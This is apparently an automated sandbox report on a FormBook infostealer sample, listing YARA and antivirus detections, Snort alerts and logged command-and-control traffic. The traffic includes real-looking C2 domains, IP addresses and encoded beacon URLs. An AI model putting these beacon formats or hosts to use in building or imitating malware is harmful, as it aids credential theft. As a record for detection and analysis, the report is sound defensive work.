"0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------

Multi AV Scanner detection for submitted file

Show sources

Source: J0OmHIagw8.exe

Virustotal: Detection: 31%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: J0OmHIagw8.exe

Joe Sandbox ML: detected

Source: 5.2.vbc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: J0OmHIagw8.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: J0OmHIagw8.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, control.exe
Source:	Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
Source:	Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then pop ebx	5_2_00406A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then pop edi	5_2_0040C3D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 4x nop then pop edi	5_2_0040C3AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	8_2_030FC3AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	8_2_030FC3D7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx	8_2_030F6A96

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 173.234.175.134:80
Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49755
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 142.44.212.169:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 192.155.166.181:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49765 -> 205.134.254.189:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49769 -> 173.234.175.134:80
Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 45.77.226.209:80 -> 192.168.2.3:49771
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49772 -> 142.44.212.169:80

Tries to download HTTP data from a sinkholed server

Show sources

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:16:25 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:17:53 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>

Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1Host: www.logansshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1Host: www.exit-divorce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1Host: www.splendidhotelspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1Host: www.stnanguo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 45.77.226.209 45.77.226.209

Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT HTTP/1.1Host: www.studentdividers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT HTTP/1.1Host: www.logansshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT HTTP/1.1Host: www.epicmassiveconcepts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT HTTP/1.1Host: www.exit-divorce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT HTTP/1.1Host: www.splendidhotelspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT HTTP/1.1Host: www.stnanguo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1Host: www.soundon.eventsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1Host: www.travelnetafrica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1Host: www.fessusesefsee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT HTTP/1.1Host: www.queensboutique1000.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.herbmedia.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:16:25 GMTServer: X-SinkHole: Malware DNS SinkHole ServerContent-Length: 307Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>

Source: explorer.exe, 00000006.00000003.291409665.00000000089DC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000000.264819810.000000000F440000.00000004.00000001.sdmp	String found in binary or memory: http://logo.verisign
Source: J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
